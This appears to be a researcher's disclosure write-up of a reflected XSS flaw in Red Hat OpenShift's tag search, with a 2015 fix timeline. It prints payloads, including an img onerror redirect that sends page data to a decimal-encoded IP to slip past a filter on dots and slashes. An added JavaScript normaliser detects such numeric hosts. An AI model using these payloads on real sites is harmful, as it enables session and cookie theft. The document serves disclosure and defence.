Reflective XSS in OpenShift by RedHat

OpenShift is an Open Hybrid Cloud Application Platform by Red Hat that allows developers to quickly develop, host, and scale applications in a cloud environment.

I have found a very simple reflective Cross-Site Scripting vulnerability: the tag searching function wasn’t filtered at all, so it was possible to display user cookies like this: <svg onload=alert(cookie)>

It soon turned out that stealing cookies is not so easy, because using a dot char (“.”) or a forward slash (“/” or “%2f”) resulted in an application error. No: for me this time…

Furthermore, the lack of a dot character meant that I could not use an IP address or a file extension for cookie exfiltration. Even worse, no “http://” or “//” schema either. But let’s take another look at the XSS Filter Evasion Cheat Sheet.

DWORD encoding to the rescue!

  1. Take an IP address ( – and convert it to decimal (3627733326).
  2. Set your cookie stealer at your IP address (I used “” for that).
  3. Create a payload without a dot char (“.”) or a forward slash (“/” or “%2f”). Only Firefox allowed me to use “http:” schema with those restrictions. Ladies and Gentlemen, please welcome: <img src=x onerror="location='http:3627733326'+'%3fq='+domain">
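
The steps above work because a browser resolves a dotless numeric host to an ordinary IPv4 address, so a filter that only rejects “.” and “/” never sees the destination. The following is an added example, not code from the original post: a JavaScript normaliser that a filter or log search can use to resolve such hosts to a canonical dotted address. It goes beyond the decimal case to the hex, octal and short dotted forms that resolve the same way; the function names and sample strings are assumptions constructed for illustration.

```javascript
// Added example (not from the original post): resolve numeric IPv4 host
// forms so filters and log searches compare canonical addresses.

// One part: "0x.." is hex, a leading "0" is octal, otherwise decimal.
function parsePart(s) {
  if (/^0x[0-9a-f]+$/i.test(s)) return parseInt(s.slice(2), 16);
  if (/^0[0-7]*$/.test(s)) return parseInt(s, 8);
  if (/^[1-9][0-9]*$/.test(s)) return parseInt(s, 10);
  return null; // not numeric, so an ordinary hostname label
}

// Returns a dotted quad, or null when host is not a numeric IPv4 form.
function canonicalIPv4(host) {
  const parts = host.replace(/\.$/, "").split(".");
  if (parts.length > 4) return null;
  const nums = parts.map(parsePart);
  if (nums.includes(null)) return null;
  const last = nums.pop();
  // Leading parts are one byte each; the last part fills the remaining bytes.
  if (nums.some((n) => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  const value = nums.reduce((acc, n, i) => acc + n * 256 ** (3 - i), last);
  return [24, 16, 8, 0].map((b) => Math.floor(value / 2 ** b) % 256).join(".");
}

// Report http:/https: targets (with or without "//") in a decoded
// parameter value whose host is a numeric IPv4 form.
function findNumericHosts(value) {
  const hits = [];
  for (const m of value.matchAll(/\bhttps?:\/{0,2}([0-9a-z.]+)/gi)) {
    const ip = canonicalIPv4(m[1]);
    if (ip) hits.push({ raw: m[0], ip });
  }
  return hits;
}

// Constructed sample values (192.0.2.1 is a documentation address).
const samples = [
  "location='http:3221225985'+'%3fq='+domain", // decimal (DWORD) form
  "http:0xC0000201",                           // hex form
  "http://0300.0.2.1/",                        // octal parts
  "http://example.com/",                       // ordinary hostname, not flagged
];
for (const s of samples) console.log(s, "->", findNumericHosts(s));
```

Normalising hosts helps detection and allowlisting only; the reflection itself is closed by output-encoding the search term before it is written into the page.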


[19th May 2015] - bug was reported
[25th August 2015] - another contact, no response
[2nd September 2015] - RedHat's response
[3rd September 2015] - partial fix
[7th October 2015] - bug was resolved

